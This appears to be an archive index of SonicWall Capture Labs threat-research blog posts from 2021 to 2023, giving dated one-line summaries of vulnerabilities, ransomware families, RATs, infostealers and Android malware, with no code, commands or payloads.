A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.
Posted: February 21, 2023
Vohuk Ransomware uses the genuine Windows tool Cipher.exe to overwrite the deleted files which make the recovery of the files impossible.
Posted: February 14, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023.
Posted: February 14, 2023
SonicWall RDTMI detecting a spike of malicious OneNote files are being delivered to the victim’s machine as an email attachments.
Posted: February 10, 2023
LockBit 3.0, also known as LockBit Black, is a ransomware family that operates under the Ransomware-as-a-Service (RaaS) model, where the creators collaborate with affiliates who may not have the resources to create and deploy attacks. […]
Posted: February 10, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KSMBD stands for Kernel-based SMB Direct. It’s a Linux kernel module that provides the implementation of the SMBv3 protocol, allowing the Linux kernel […]
Posted: February 3, 2023
This week, the Sonicwall Capture Labs Research team analyzed a sample of Berbew, a trojan that has been seen used in connection with Download.Ject and FormBook to steal user passwords for banking and other financial […]
Posted: February 3, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: ManageEngine is a subsidiary of Zoho Corporation that provides IT management software for businesses. The company offers a range of products for network, […]
Posted: January 27, 2023
This week, the Sonicwall Capture Labs Research team analyzed a ransomware called Magniber. This ransomware has been around since 2017 as a successor to Cerber and initially only targeted a specific country when we first […]
Posted: January 27, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Adobe ColdFusion is an application development platform by Adobe Systems. It is an IDE used to develop web applications and supports a full […]
Posted: January 20, 2023
Control Web Panel 7 versions prior to 0.9.8.1147 suffer from an unauthenticated remote code execution vulnerability.
Posted: January 13, 2023
The SonicWall Capture Labs threat reseach team have tracking a well established ransomware family known as GPcode. GPcode ransomware is typically spread through email attachments or social engineering techniques, such as disguising the malware as a […]
Posted: January 10, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2023.
Posted: January 6, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: daloRADIUS is an advanced RADIUS web management application aimed at managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, […]
Posted: December 22, 2022
Command injection vulnerability exists in TOTOLink A3000RU routers which could allow attackers to execute arbitrary commands.
Posted: December 22, 2022
This week, the SonicWall Capture Labs Threat Research Team analyzed a new sample of Raspberry Robin. First observed in May 2022 by Red Canary, Raspberry Robin is a worm that has evolved to be a […]
Posted: December 16, 2022
This week, the Sonicwall Capture Labs Research team analyzed a ransomware called Cryptonite. It is an open-sourced ransomware that was once available on GitHub but has now been taken down. It exhibited behavior consistent of […]
Posted: December 13, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2022.
Posted: December 9, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Centreon is a network, system and application monitoring tool. Centreon is the only AIOps Platform Providing Holistic Visibility to Complex IT Workflows from […]
Posted: December 2, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Apache Airflow is an open-source workflow management platform. Apache Airflow is a flexible, scalable workflow automation and scheduling system for authoring and managing […]
Posted: November 23, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Delta Electronics InfraSuite Device Master is a tool for centralized monitoring and control of a large number of devices. Users create a human-machine […]
Posted: November 18, 2022
The Tenda AC1200 router does not perform proper validation of user-supplied input and is vulnerable to cross-site scripting attacks.
Posted: November 11, 2022
The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by a well organized cybercrime […]
Posted: November 9, 2022
Introduction After several months of hiatus, Emotet is back. SonicWall Capture Labs threat research team has observed starting last week that the notorious malware, which heavily targets large organizations, has returned with similar tactics and […]
Posted: November 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2022.
Posted: November 3, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The OpenSSL Project develops and maintains the OpenSSL software a robust, commercial-grade, full-featured toolkit for general-purpose cryptography and secure communication. OpenSSL contains an […]
Posted: November 2, 2022
Malware authors are extensively using C# code to build malware since last few years, due to its simplicity and rich Application Programming Interfaces (API). RedLine is a C# written advanced info stealer active in the wild since 2020.
Posted: October 28, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KeySight N6854A Geolocation server software and the N6841A RF Sensor software provide an easy way to configure all of the RF Sensors in […]
Posted: October 20, 2022
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts.
Posted: October 14, 2022
The Sonicwall Capture Labs Research team came across a malware which purports to be a picture but has the intention to wipe the hard drive thus deleting data and programs. It is a multicomponent infection […]
Posted: October 11, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2022.
Posted: October 7, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Schneider Electric’s Interactive Graphical Supervisory Control and Data Acquisition (SCADA) System (IGSS) is used for monitoring and controlling industrial processes. According to the […]
Posted: September 30, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: mySCADA professional tools are for developing and managing HMI (Human-Machine Interface)/SCADA (Supervisory Control and Data Acquisition) industrial processes. myPRO is one tool in […]
Posted: September 30, 2022
Recently we have seen multiple droppers dropping infostealers or banking trojans along with ransomware. Few weeks ago our researchers at SonicWall labs observed a clipbanker i.e. Clipboard Hijacker being dropped by djvu(STOP) ransomware. Behaviour: The […]
Posted: September 30, 2022
Recent Microsoft Exchange Server zero day vulnerabilities are being exploited in the wild.
Posted: September 29, 2022
SonicWall Capture Labs Threat Research team has observed a PDF file getting detected by SonicWall Real Time Deep Memory Inspection (RTDMI), which comes as an e-mail attachment. The PDF file contains a link which downloads […]
Posted: September 23, 2022
Wavlink WN533A8 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter
Posted: September 22, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about the malware threats targeting Android devices. SonicWall has tracked down some active trojan SMS applications. This Android SMS app purports to be a […]
Posted: September 13, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2022.
Posted: September 9, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: AVideo is a powerful base platform for uploading, curating, organizing, indexing, and distributing audio and video content. The plugin design allows you to […]
Posted: September 2, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Zimbra Collaboration is a collection of tools designed for collaboration. Tools within the suite include an email server, a chat server, a file […]
Posted: August 26, 2022
Overview: TightVNC is a remote desktop software application. It lets you connect to another computer and display its live remote desktop or control the remote computer with your mouse and keyboard, just as you would […]
Posted: August 22, 2022
SonicWall threat research team has observed a JavaScript file inside an archive is being delivered to the victim’s machine as an email attachment which further downloads Java based Remote Access Trojan (RAT) STRRAT to the victim’s machine.
Posted: August 19, 2022
A directory traversal vulnerability exists in Cisco’s Adaptive Security Appliance software and Firepower Threat Defense software web services
Posted: August 19, 2022
SonicWall Capture Labs Threat Research team has been observing Android adware that were available on the Google play store, they are now removed from the play store but are still being distributed via third-party platforms. […]
Posted: August 16, 2022
A new type of remote access trojan (RAT) has been identified by several AV companies. Dubbed ‘WoodyRAT’ due to the debugging information string, it is a multi-featured payload with a list of capabilities. As with […]
Posted: August 9, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2022.
Posted: August 5, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Ivanti Avalanche is a mobile device management system. The Avalanche Certificate Manager Server (CMS) enables the use of EAP-TLS wireless security and distribution […]
Posted: August 5, 2022
WhatsApp is being abused to target Indian customers for fraudulent attacks
Posted: July 29, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Apache Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Java, Scala, Python and R, and an […]
Posted: July 22, 2022
The Sonicwall CaptureLabs threat research team has observed reports of the launch of a new ransomware family named Lilith. Lilith ransomware is written in C/C++ and targets 64-bit Windows machines. Encrypted files are marked with […]
Posted: July 22, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: MySQL is a popular open-source implementation of a relational database that supports the Structured Query Language (SQL) for querying and updating stored data. […]
Posted: July 21, 2022
A VBScript is used by the threat actor to deliver fileless AsyncRAT to the victim’s machine
Posted: July 14, 2022
SonicWall Capture Labs Threat Research team has observed a malicious PDF file, comes as an e-mail attachments, detected by SonicWall RTDMI ™ engine which is delivering REMCOS RAT as the final payload.
Posted: July 13, 2022
Sonicwall Capture Labs Threat Research team has observed many Android locker ransomware which asks to communicate using social media platforms. There is no assurance of getting the key even after paying the ransom amount, they […]
Posted: July 12, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2022.
Posted: July 8, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Advantech iView is a Simple Network Management Protocol-based element management software provided free-of-charge with intelligent FTTx, Optical Access, Media Conversion and eWorx Smart […]
Posted: July 1, 2022
An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Posted: June 27, 2022
GuLoader is a file less shellcode based malware which downloads other malware and executes them under legitimate processes
Posted: June 24, 2022
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerability in Vacron NVR
Posted: June 23, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about malwares including spyware targeting Android devices. SonicWall has tracked down a huge number of fake applications disguised as legitimate Google update applications. Fig […]
Posted: June 22, 2022
SonicWall Capture Labs Threats Research team has been regularly sharing information about malware threats targeting Android devices. Recently we have observed some fake fantasy league betting applications in the wild. Google Play store banned all […]
Posted: June 21, 2022
SonicWall threat research team has observed an HTA file inside an archive is being delivered to the victim’s machine, which further downloads and executes Smoke Loader malware
Posted: June 14, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2022.
Posted: June 10, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Atlassian Confluence is a collaboration platform that allows you to build a knowledge base for documentation, product requirements, create, collaborate, comment on pages, […]
Posted: June 10, 2022
The SonicWall Capture Labs threat research team analyzed the latest cryptomining and infostealing Trojan from a well-known malware group called TeamTNT. They are known to target vulnerable *nix systems and would deploy cryptominer and a […]
Posted: June 1, 2022
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: CVE-2022-30190 a.k.a Follina, The Microsoft Office zero-day vulnerability allows applications like Microsoft Word to execute code (without macros) by calling MSDT (Microsoft Support […]
Posted: May 27, 2022
Overview: WordPress is an open source, PHP-based Content Management System (CMS) that offers several features such as multiple users, editing, custom formatting of text and an architecture which supports plugins to further extend its functionality. […]
Posted: May 27, 2022
The SonicWall Capture Labs threat research team have read reports of a set of malicious scripts, still live online at the time of writing, that install crypto mining software on Linux servers. There are 3 […]
Posted: May 24, 2022
LokiBot is being delivered to the victim’s machine using a Windows Script File for last few weeks
Posted: May 20, 2022
On F5 BIG-IP undisclosed requests may bypass iControl REST authentication leading to remote command execution
Posted: May 10, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2022.
Posted: May 6, 2022
Overview: Parse platform, provides SDKs for various environments (Android, iOS, PHP, .NET, …) as well as managed cloud data storage. When creating mobile apps a lot of the development time goes into managing and scaling […]
Posted: May 2, 2022
This week the Sonicwall Capture Labs Research team has come across a malicious document template which delivered a remote access Trojan to unsuspecting victims. It guises as a mental health survey which silently drops a […]
Posted: April 29, 2022
Overview: WSO2 offers a platform of middleware products for agile integration, application programming interface (API) management, identity and access management, and smart analytics. A directory traversal vulnerability has been reported in WSO2 API Manager. The […]
Posted: April 22, 2022
Overview: VMware’s Workspace ONE Access, VMware Identity Manager (vIDM), vRealize Lifecycle Manager, vRealize Automation, and VMware Cloud Foundation products; contain a remote code execution vulnerability due to server-side template injection. A remote, unauthenticated attacker can […]
Posted: April 15, 2022
The Sonicwall CaptureLabs threat research team has observed reports of ransomware which, in the Antivirus community, goes by the name TargetCompany. The malware surfaced in June 2021. The current variant that we have obtained is […]
Posted: April 12, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2022.
Posted: April 8, 2022
D-Link DIR-806 Devices Command Injection attacks spotted in the wild.
Posted: April 1, 2022
Feature rich spyware for Android
Posted: April 1, 2022
Overview: A Spring MVC (Model-View-Controller) or Spring WebFlux (Parallel version of Spring MVC which supports non-blocking reactive streams) application running on JDK (Java Development Kit) 9+ may be vulnerable to Remote Code Execution (RCE) via […]
Posted: March 25, 2022
This week the Sonicwall Capture Labs Research team analyzed a ransomware sample that is rather unconventional. After encrypting the victim’s files, it does not demand payment but rather asks the victim to carry out certain […]
Posted: March 25, 2022
Overview: A denial-of-service vulnerability has been reported in the OpenSSL library. The vulnerability is due to insufficient validation in BN_mod_sqrt() function. A remote attacker could exploit the vulnerability by sending crafted packets to an OpenSSL […]
Posted: March 18, 2022
As the war between Russia and Ukraine rages on, the conflict has extended into the cyber domain. In mid-February, the Security Service of Ukraine reported that the country was the target of an ongoing “wave […]
Posted: March 18, 2022
A SQL injection vulnerability exists in WP Statistics Plugin for WordPress. The vulnerability is due to insufficient sanitization of the current_page_id and current_page_type parameter.
Posted: March 10, 2022
Contains capability to accept and execute commands
Posted: March 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2022.
Posted: March 4, 2022
The conflict between Russia and Ukraine has quickly escalated from the ground onto the cyberspace. Last week, the Sonicwall Capture Labs Research team has analyzed the HermeticWiper malware attack that was targeting Ukraine in this […]
Posted: March 4, 2022
Overview: Samba is an open-source implementation of file, print, and other network services suite known as SMB/CIFS (Server Message Block/Common Internet File System). Samba implements several protocols and services including NetBIOS over TCP/IP (NBT), SMB, […]
Posted: February 25, 2022
Overview: The H2 console application allows a user to access a SQL database using a browser interface. H2 is an open source Java SQL database that includes the following technology; JDBC, (Java Database Connectivity) is […]
Posted: February 25, 2022
The Sonicwall threat research team have recently observed a new variant of BitPyLock ransomware. This family of ransomware surfaced in early 2020. It encrypts files and also threatens extortion by claiming to have sent files […]
Posted: February 25, 2022
The SonicWall Capture Labs Threat Research team has analyzed a sample which is widely believed to be targeting Ukrainian organizations. The malware sample is digitally signed issued under the company name ‘Hermetica Digital Ltd’. There […]
Posted: February 18, 2022
SonicWall Threats Research Team received reports of an Android malware in the wild that was hosted on an active domain. This malware appears to be a Remote Access Trojan that has a number of capabilities. […]
Posted: February 17, 2022
Arbitrary command execution in formSysCmd via the sysCmd parameter exists in this Realtek SDK. Successful exploitation of this vulnerability allows remote attackers to achieve arbitrary code execution on the device.
Posted: February 11, 2022
The SonicWall Capture Labs Threat Research team has come across a ransomware with a bizaare demand in exchange for decryption. This ransomware calls itself “Black Eye” but instead of demanding for cryptocurrency as payment, it […]
Posted: February 8, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2022.
Posted: February 4, 2022
Overview: EmbedThis GoAhead is a popular compact web server intended and optimized for embedded devices. Despite its small size, the server supports HTTP/1.1, CGI handler among others. An unrestricted file upload vulnerability has been reported […]
Posted: February 4, 2022
The Sonicwall threat research team have recently seen reports of ransomware called Argos 2.0. The ransomware works like most others, encrypting files and demanding payment in bitcoin for file recovery. However, reverse engineering the malware […]
Posted: January 28, 2022
Overview: MySQL is a popular open-source implementation of a relational database that supports the Structured Query Language (SQL) for querying and updating stored data. Communication with the database occurs using the MySQL protocol. As with […]
Posted: January 21, 2022
A malicious variant already observed in the wild
Posted: January 19, 2022
Grafana is a multi-platform, open-source analytics and interactive visualization web application. It provides charts, graphs, and alerts for the web when connected to supported data sources. Directory Traversal Vulnerability Grafana versions 8.0.0-beta1 through 8.3.0 are […]
Posted: January 14, 2022
The Sonicwall Capture Labs threat research team has come across a linux variant of a ransomware early on this week. Avoslocker is another ransomware-as-a-service (RaaS) selling their ready-made ransomware to affiliates to carry out ransomware […]
Posted: January 11, 2022
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2022.
Posted: January 7, 2022
Overview: GitLab is web-based Git repository manager that includes additional features to handle all stages of the DevOps lifecycle including continuous integration and delivery, issue tracking, monitoring, and integration with many other applications. GitLab is […]
Posted: January 7, 2022
The SonicWall Capture Labs threat research team has come across data theft malware derived from the Mercurial password stealer family. This malware is open source and readily available on github for “educational purposes only”. Because […]
Posted: December 31, 2021
Overview: Apache Log4j is a logging library for Java. Log4j is a simple and flexible logging framework. With Log4j it is possible to enable logging at runtime without modifying the application binary. Apache Log4j is […]
Posted: December 29, 2021
Github is a platform which is commonly used to host open-source projects, many such projects are security focused. SonicWall Threats Research team recently identified an Android ransomware that was found to be hosted on Github […]
Posted: December 23, 2021
With Christmas weekend upon us and many are still looking for the best last-minute deals, we noticed we are receiving an increasing amount of holiday related spam emails. We have been monitoring the amount of […]
Posted: December 20, 2021
SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in Yealink devices.
Posted: December 17, 2021
The SonicWall Capture Labs threat research team has been tracking ransomware, known to some in the antivirus community as GarrantDecrypt. The current variant of this ransomware appeared in late November 2021. The malware is aimed […]
Posted: December 15, 2021
ISO files are being abused by threat actors to deliver the payload to the victim’s machine, without being detected.
Posted: December 14, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2021.
Posted: December 10, 2021
Overview: Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent […]
Posted: December 10, 2021
Overview: ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment such as changes, incidents and assets and also incorporates a standard ITIL framework. ManageEngine SupportCenter […]
Posted: December 9, 2021
Contains multiple features including the ability to communicate with the attackers via Telegram
Posted: December 7, 2021
SonicWall Capture Labs Threats Research team has been detecting an ongoing phishing campaign which abuses users by pretending to be genuine software platform using their logo. Upon opening the PDF file, an image with instructions […]
Posted: December 3, 2021
Overview: Microsoft Exchange Server is an ASP.NET implementation of an email and calendaring server and is capable of handling most standard Internet protocols as well as numerous proprietary Microsoft protocols and formats. Microsoft Exchange Server […]
Posted: December 3, 2021
A number of WordPress websites have been infected with what appeared to be ransomware. The infected websites show a warning on its homepage saying the site has been encrypted and listing a bitcoin address on […]
Posted: December 2, 2021
SonicWall Capture Labs Threats Research team has been regularly sharing information about the malware threats targeting Android devices. SonicWall has tracked down the huge number of financial fraud applications. Since the start of the […]
Posted: November 19, 2021
This week the Sonicwall Capture Labs Research team analyzed malware samples that appear to be targeting one of the popular cloud computing platforms, Alibaba Cloud (Aliyun). Alibaba Cloud might not be the first name that […]
Posted: November 18, 2021
A command injection vulnerability exists in the web server of some Hikvision product
Posted: November 11, 2021
With the rise in popularity and investments in Crypto currency there has been a rise in Crypto related scams as well. SonicWall Threats Research team identified an Android crypto wallet stealing malicious Android application. […]
Posted: November 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2021.
Posted: November 5, 2021
Overview: The SolarWinds Orion Platform is the base platform used by numerous SolarWinds products such as Network Performance Monitor, Virtualization Manager, and Server Configuration Monitor. The platform is designed to seamlessly integrate all Orion-based products […]
Posted: November 5, 2021
The SonicWall Capture Labs threat research team has come across new ransomware known as Foxxy. This ransomware appeared in late October 2021 and the sample we have obtained appears to be a proof of concept […]
Posted: October 29, 2021
Overview: The Apache HTTP server is the most popular web server used on the Internet. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in […]
Posted: October 29, 2021
A malicious PowerShell script steals and sends email addresses from Outlook contacts.
Posted: October 27, 2021
Contains a number of spyware functions
Posted: October 22, 2021
Even back in the day, cybercriminals have been masking malware within pictures, screensavers or games that can be downloaded for free. But now, since the Internet has grown immensely into a huge form of entertainment […]
Posted: October 21, 2021
SonicWall Capture Labs threat research team observed attacks exploiting SQL injection vulnerability in WordPress WooCommerce plugin.
Posted: October 12, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2021.
Posted: October 8, 2021
Overview: VMware vCenter Server is a data centre management server application developed by VMware Inc. VMware vCenter Server is designed primarily for vSphere, VMware’s platform for building virtualized cloud infrastructures. As part of a broader […]
Posted: October 1, 2021
Overview: OpenLDAP is an open-source implementation of the Lightweight Directory Access Protocol (LDAP) service. On a default installation, the OpenLDAP server uses TCP port 389 for communication. The OpenLDAP server has a modular architecture where […]
Posted: October 1, 2021
The SonicWall Capture Labs threat research team has observed a continued increase in ransomware used in double extortion schemes. The operators of ransomware known as AtomSilo have recently infiltrated a Brazilian pharmaceutical company. The malware […]
Posted: September 23, 2021
SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in Buffalo routers.
Posted: September 14, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2021.
Posted: September 10, 2021
Overview: Atlassian Confluence is a collaboration platform written in Java. Users can create content using spaces, pages, and blogs which other users can comment on and edit. It is written primarily in Java and runs […]
Posted: September 3, 2021
Lockbit ransomware has been around since 2019 but recently released an updated version called Lockbit 2.0. It is another ransomware-as-a-service (RaaS) which is a subscription based model allowing partners to use a full-featured already developed […]
Posted: September 3, 2021
Overview: Centreon is an open source IT monitoring solution. Centreon open source solution is the foundation for the Centreon EMS software suite which offers additional licensed modules. Centreon open source solution includes integration tools for […]
Posted: August 27, 2021
Overview: Nagios is an open source host, service and network monitoring program. The product’s functionality is implemented through a number of server-side programs primarily written in PHP with a backend database running MariaDB, a drop-in […]
Posted: August 19, 2021
An unauthenticated command injection vulnerability exists in ZeroShell. SonicWall Capture Labs threat research team observed attacks exploiting this vulnerability.
Posted: August 12, 2021
The SonicWall Capture Labs threat research team has recently been tracking malware that does more than encrypt files and demand a ransom. In the ransomware space there has been an increase in malware that also […]
Posted: August 10, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2021.
Posted: August 6, 2021
Overview: Advantech R-SeeNet is a monitoring application that runs on a server and its job is to collect information from the routers, store it, process it and present it to a network administrator. R-SeeNet consists […]
Posted: July 30, 2021
Overview: 3S Smart Software Solutions CoDeSys is an IEC 61131-compliant PLC program development environment for multiple programming languages. CoDeSys supports PLC devices from over 250 device manufacturers. The CoDeSys Gateway Server is a service which […]
Posted: July 21, 2021
Malware writers often use trending topics to masquerade their malicious creations. Ever since early 2020 the Covid-19 pandemic has given fuel to malware writers and scamsters to use Covid related themes to hide malicious applications. […]
Posted: July 19, 2021
Cross-site scripting (XSS)Vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software.
Posted: July 15, 2021
SonicWall Threats Research team has observed a highly obfuscated batch(BAT) file inside an archive which is downloaded to the victim’s machine. The BAT file executes a PowerShell script which downloads an archive file containing Metamorfo […]
Posted: July 13, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2021.
Posted: July 9, 2021
The recent Kaseya VSA server exploit incident has given an opportunity for cybercriminals to distribute fake Kaseya update programs. An unsuspecting user is tricked to downloading a program that appears to be from Kaseya but […]
Posted: July 9, 2021
Overview: Oracle Endeca Server is a hybrid search-analytical database. It organizes complex and varied data from disparate source systems into a flexible data model that reduces the need for upfront modeling. Oracle Endeca Server is […]
Posted: July 6, 2021
The SonicWall Capture Labs threat research team has analyzed the ransomware that is spreading using the exploitation of the Kaseya standalone on-premises VSA server and the subsequent supply-chain attacks. The attack starts with exploitation of […]
Posted: July 2, 2021
Overview: A new remote code execution (RCE) has been discovered in Microsoft Windows Print Spooler service. This vulnerability has been referred to publicly as PrintNightmare and assigned as CVE-2021-34527. According to the vendor, this vulnerability […]
Posted: July 2, 2021
Overview: Oracle E-Business Suite is a collection of applications for Enterprise Resource Planning (ERP), Customer Relationship Management (CRM), and Supply Chain Management (SCM) and contains several product lines intended for specific use cases. The E-Business […]
Posted: July 1, 2021
The SonicWall Capture Labs threat research team have been tracking ransomware that encrypts and gives files a “.snoopdog” filename extension. The operator charges 1 BTC for file retrieval. However, as with most ransomware today, the […]
Posted: June 25, 2021
Overview: Advantech iView application enables network managers to configure, update, manage and monitor B+B SmartWorx solutions from a central location. It is a Simple Network Management Protocol-based element management software provided free-of-charge with all intelligent […]
Posted: June 18, 2021
With multiple obfuscation layers
Posted: June 17, 2021
A CRLF injection vulnerability exists in BF-430, BF-431, and BF-450M TCP IP Converter devices.
Posted: June 11, 2021
The SonicWall Capture Labs Research team has been observing a massive increase in ransomware attacks with increasingly targeted attacks hitting mostly critical infrastructures. With companies willing to pay millions in ransom payment to restore operations, […]
Posted: June 8, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2021.
Posted: June 4, 2021
Overview: Multiple vulnerabilities have been discovered and reported in the VMware vSphere Client (HTML5), specifically in VMware vCenter Server vSAN Health Check plug-in product. Among these vulnerabilities, CVE-2021-21985 is a remote code execution vulnerability rated […]
Posted: June 4, 2021
Overview: Microsoft Visual Studio is an integrated development environment (IDE) from Microsoft. It can be used to develop console and graphical user interface (GUI) applications along with web sites, web applications, and web services. This […]
Posted: May 28, 2021
Overview: Netgear ProSAFE Network Management System NMS300 is a centralized and comprehensive management application for network administrators that enables them to discover, monitor, configure, and report on SNMP based enterprise-class network devices. The Netgear Network […]
Posted: May 27, 2021
The SonicWall Capture Labs threat research team have recently been tracking Conti ransomware. It has been reported that Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting […]
Posted: May 21, 2021
F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability
Posted: May 21, 2021
Contains hardcoded targets
Posted: May 14, 2021
The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. If available on the victim’s machine, this Trojan steals various cryptocurrency data, credit card info, ftp server info and credentials on Discord, Telegram, […]
Posted: May 11, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2021.
Posted: May 7, 2021
Overview: Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Apache OFBiz is a […]
Posted: April 30, 2021
Overview: Eaton’s Intelligent Power Manager (IPM) software provides the tools needed to monitor and manage power devices in your physical or virtual environment keeping devices up and running during a power or environmental event. This […]
Posted: April 30, 2021
The SonicWall Capture Labs Threat Research Team has observed a new Microsoft Excel sample, which uses curl.exe to download AVE Maria Remote Admin Tool. This sample launches curl.exe using XLM Macro. cURL is a command-line […]
Posted: April 23, 2021
Targets mostly include a number of financial apps
Posted: April 23, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Runsomeaware RaaS actively spreading in the wild. Ransomware as a service (RaaS) is a subscription-based / free model that enables […]
Posted: April 22, 2021
Ignition versions prior to 2.5.2, as used in Laravel allows unauthenticated remote attackers to execute arbitrary code.
Posted: April 16, 2021
Snake KeyLogger malware is being distributed using malicious word documents
Posted: April 16, 2021
The Sonicwall Capture Labs Research team has observed another ransomware being circulated in the wild recently. To maintain communications with the compromised system this ransomware uses Discord’s built in webhooks function. Discord is much more […]
Posted: April 13, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2021.
Posted: April 9, 2021
Overview: VMware vRealize Operations Manager delivers intelligent operations management with application-to-storage visibility across physical, virtual, and cloud infrastructures. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF) vulnerability in VMware vRealize Operations API. The vulnerability was […]
Posted: April 9, 2021
The SonicWall Capture Labs threat research team have been tracking a ransomware family named Uniwinnicrypt. This malware is aimed at large corporations and the operators charge over $550k USD in crypto (Monero and Bitcoin) for […]
Posted: April 2, 2021
Overview: A denial of service vulnerability has been reported in OpenSSL library. An OpenSSL TLS server may crash if a remote attacker sends a maliciously crafted renegotiation ClientHello message (the exploit) from a client. If […]
Posted: March 26, 2021
Overview: SonicWall’s Capture Labs Threat Research Team, recently captured and evaluated a new malicious sample termed Spyder, from China’s “Winnti” hacking group. This backdoor is written in C++ and designed to run on 64-bit Windows. […]
Posted: March 26, 2021
The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Hog ransomware actively spreading in the wild. The Hog ransomware encrypts the victim’s files with a strong encryption algorithm and […]
Posted: March 18, 2021
SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL routers.
Posted: March 18, 2021
Infections continue even after gang member arrest
Posted: March 17, 2021
The SonicWall Capture Labs Threat Research Team has observed that a fake Space Starbase Invite is being circulated over email with a malicious excel document as an attachment. On opening the attachment, it will execute VBA […]
Posted: March 16, 2021
The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are […]
Posted: March 12, 2021
As Covid-19 vaccinations happen across the country, cybercriminals are riding the wave again using social engineering tactics purporting to be vaccine-related information to spread malware and steal user information. The Sonicwall Capture Labs Research team […]
Posted: March 9, 2021
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2021.
Posted: March 8, 2021
Overview: SonicWall Capture Labs Threat Research Team recently found a new sample for 8t_Dropper aka RoyalRoad. Royal Road is a tool shared by many targeted attack groups believed to belong to China. The sample below […]
Posted: March 5, 2021
The SonicWall Capture Labs Threat Research team has received reports that threat actors are actively exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-26855 CVE-2021-26857 CVE-2021-26858 CVE-2021-27065 These vulnerabilities allow the attackers access to emails found in […]
Posted: March 5, 2021
